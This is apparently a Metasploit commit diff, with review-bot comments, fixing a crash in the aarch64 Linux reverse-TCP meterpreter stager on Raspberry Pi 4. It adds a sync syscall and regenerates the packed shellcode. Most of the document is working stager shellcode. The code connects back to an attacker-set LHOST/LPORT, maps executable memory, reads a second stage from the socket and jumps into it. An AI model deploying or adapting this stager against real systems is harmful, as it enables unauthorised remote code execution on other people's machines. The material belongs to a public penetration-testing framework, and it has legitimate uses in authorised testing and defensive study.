
Commit c7d59ce

Merge pull request rapid7#19875 from dledda-r7/fix/aarch64-sigill-raspberrypi
Fix SIGILL on staged meterpreter on RaspberryPi4
2 parents 0b0b9bb + cdac135 commit c7d59ce


2 files changed

+64
-56
lines changed


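--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -77,6 +77,10 @@ read_loop:
 svc 0
 cmn x0, #0x1
 beq failed
+mov x2, x0 // The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
+mov x8, #0x51 // More information here:
+svc 0 // https://github.com/rapid7/metasploit-framework/pull/19875
+mov x0, x2 //
 add x3, x3, x0
 subs x4, x4, x0
 bne read_loop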
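Review bot: The comment on the added `mov x2, x0` line explains the sync() call only as fixing "a strange bug", and the trailing `//` on `mov x0, x2` is an empty comment, so the next reader cannot tell whether the syscall is load-bearing. Syscall 0x51 (sync) has a system-wide side effect: it flushes every dirty filesystem buffer on the host, once per read_loop iteration, which is a noticeable I/O event and extra audit noise rather than a local fix. Presumably the SIGILL comes from executing the freshly read bytes without any instruction-cache maintenance on a core whose I-cache is not coherent with data writes (the RPi4's Cortex-A72 behaves this way), in which case sync() is an indirect workaround and the comment should say so, e.g. `// Workaround: sync() (0x51) flushes all dirty fs buffers; suspected I-cache coherency issue on RPi4, root cause unconfirmed`. The `blr` that runs the received stage and the rest of read_loop are outside this hunk.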

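--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-CachedSize = 212
+CachedSize = 228
 
 include Msf::Payload::Linux::Aarch64::Prepends
 include Msf::Payload::Stager
@@ -32,65 +32,69 @@ def initialize(info = {})
 {
 'Offsets' =>
 {
-'LPORT' => [ 206, 'n' ],
-'LHOST' => [ 208, 'ADDR' ],
+'LPORT' => [ 222, 'n' ],
+'LHOST' => [ 224, 'ADDR' ],
 },
 'Payload' =>
 [
 # Generated from external/source/shellcode/linux/aarch64/stager_sock_reverse.s
-0xd2800040, # mov x0, #0x2 // #2
-0xd2800021, # mov x1, #0x1 // #1
-0xd2800002, # mov x2, #0x0 // #0
-0xd28018c8, # mov x8, #0xc6 // #198
-0xd4000001, # svc #0x0
-0xaa0003ec, # mov x12, x0
-0x100005a1, # adr x1, cc <sockaddr>
-0xd2800202, # mov x2, #0x10 // #16
-0xd2801968, # mov x8, #0xcb // #203
-0xd4000001, # svc #0x0
-0x350004c0, # cbnz w0, c0 <failed>
-0xaa0c03e0, # mov x0, x12
-0xd10043ff, # sub sp, sp, #0x10
-0x910003e1, # mov x1, sp
-0xd2800082, # mov x2, #0x4 // #4
-0xd28007e8, # mov x8, #0x3f // #63
-0xd4000001, # svc #0x0
-0xb100041f, # cmn x0, #0x1
-0x540003c0, # b.eq c0 <failed>
-0xb94003e2, # ldr w2, [sp]
-0xd34cfc42, # lsr x2, x2, #12
-0x91000442, # add x2, x2, #0x1
-0xd374cc42, # lsl x2, x2, #12
-0xaa1f03e0, # mov x0, xzr
-0xaa0203e1, # mov x1, x2
-0xd28000e2, # mov x2, #0x7 // #7
-0xd2800443, # mov x3, #0x22 // #34
-0xaa1f03e4, # mov x4, xzr
-0xaa1f03e5, # mov x5, xzr
-0xd2801bc8, # mov x8, #0xde // #222
-0xd4000001, # svc #0x0
-0xb100041f, # cmn x0, #0x1
-0x54000200, # b.eq c0 <failed>
-0xb94003e4, # ldr w4, [sp]
-0xf90003e0, # str x0, [sp]
-0xaa0003e3, # mov x3, x0
-0xaa0c03e0, # mov x0, x12
-0xaa0303e1, # mov x1, x3
-0xaa0403e2, # mov x2, x4
-0xd28007e8, # mov x8, #0x3f // #63
-0xd4000001, # svc #0x0
-0xb100041f, # cmn x0, #0x1
-0x540000c0, # b.eq c0 <failed>
-0x8b000063, # add x3, x3, x0
-0xeb000084, # subs x4, x4, x0
-0x54fffee1, # b.ne 90 <read_loop>
-0xf94003e0, # ldr x0, [sp]
-0xd63f0000, # blr x0
-0xd2800000, # mov x0, #0x0 // #0
-0xd2800ba8, # mov x8, #0x5d // #93
-0xd4000001, # svc #0x0
-0x5c110002, # .word 0x5c110002
-0x0100007f, # .word 0x0100007f
+0xd2800040, # mov x0, #0x2 // #2
+0xd2800021, # mov x1, #0x1 // #1
+0xd2800002, # mov x2, #0x0 // #0
+0xd28018c8, # mov x8, #0xc6 // #198
+0xd4000001, # svc #0x0
+0xaa0003ec, # mov x12, x0
+0x10000621, # adr x1, dc <sockaddr>
+0xd2800202, # mov x2, #0x10 // #16
+0xd2801968, # mov x8, #0xcb // #203
+0xd4000001, # svc #0x0
+0x35000540, # cbnz w0, d0 <failed>
+0xaa0c03e0, # mov x0, x12
+0xd10043ff, # sub sp, sp, #0x10
+0x910003e1, # mov x1, sp
+0xd2800082, # mov x2, #0x4 // #4
+0xd28007e8, # mov x8, #0x3f // #63
+0xd4000001, # svc #0x0
+0xb100041f, # cmn x0, #0x1
+0x54000440, # b.eq d0 <failed> // b.none
+0xb94003e2, # ldr w2, [sp]
+0xd34cfc42, # lsr x2, x2, #12
+0x91000442, # add x2, x2, #0x1
+0xd374cc42, # lsl x2, x2, #12
+0xaa1f03e0, # mov x0, xzr
+0xaa0203e1, # mov x1, x2
+0xd28000e2, # mov x2, #0x7 // #7
+0xd2800443, # mov x3, #0x22 // #34
+0xaa1f03e4, # mov x4, xzr
+0xaa1f03e5, # mov x5, xzr
+0xd2801bc8, # mov x8, #0xde // #222
+0xd4000001, # svc #0x0
+0xb100041f, # cmn x0, #0x1
+0x54000280, # b.eq d0 <failed> // b.none
+0xb94003e4, # ldr w4, [sp]
+0xf90003e0, # str x0, [sp]
+0xaa0003e3, # mov x3, x0
+0xaa0c03e0, # mov x0, x12
+0xaa0303e1, # mov x1, x3
+0xaa0403e2, # mov x2, x4
+0xd28007e8, # mov x8, #0x3f // #63
+0xd4000001, # svc #0x0
+0xb100041f, # cmn x0, #0x1
+0x54000140, # b.eq d0 <failed> // b.none
+0xaa0003e2, # mov x2, x0
+0xd2800a28, # mov x8, #0x51 // #81
+0xd4000001, # svc #0x0
+0xaa0203e0, # mov x0, x2
+0x8b000063, # add x3, x3, x0
+0xeb000084, # subs x4, x4, x0
+0x54fffe61, # b.ne 90 <read_loop> // b.any
+0xf94003e0, # ldr x0, [sp]
+0xd63f0000, # blr x0
+0xd2800000, # mov x0, #0x0 // #0
+0xd2800ba8, # mov x8, #0x5d // #93
+0xd4000001, # svc #0x0
+0x5c110002, # .short 0x5c110002
+0x0100007f # .word 0x0100007f
 ].pack("V*")
 }
 ))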
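Review bot: The comment on the first sockaddr word now reads `# .short 0x5c110002`, but the value is a 32-bit word packed by `pack("V*")` like every other entry; it holds sin_family and sin_port, and the new `'LPORT' => [ 222, 'n' ]` offset points two bytes into it, so the comment should stay `# .word 0x5c110002` or, better, describe the layout, e.g. `# sockaddr_in: sin_family=2, sin_port (LPORT patched at 222)`. The last element also lost its trailing comma (`0x0100007f # .word 0x0100007f`), which is valid Ruby but makes the next regeneration diff noisier than it needs to be. `CachedSize = 228` and the 222/224 offsets are consistent with the 57 words now in the array, but nothing in the module ties them to the generated blob, so a comment stating that both must be recomputed whenever the assembly source changes would help the next maintainer. The `initialize` method starts before this hunk.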
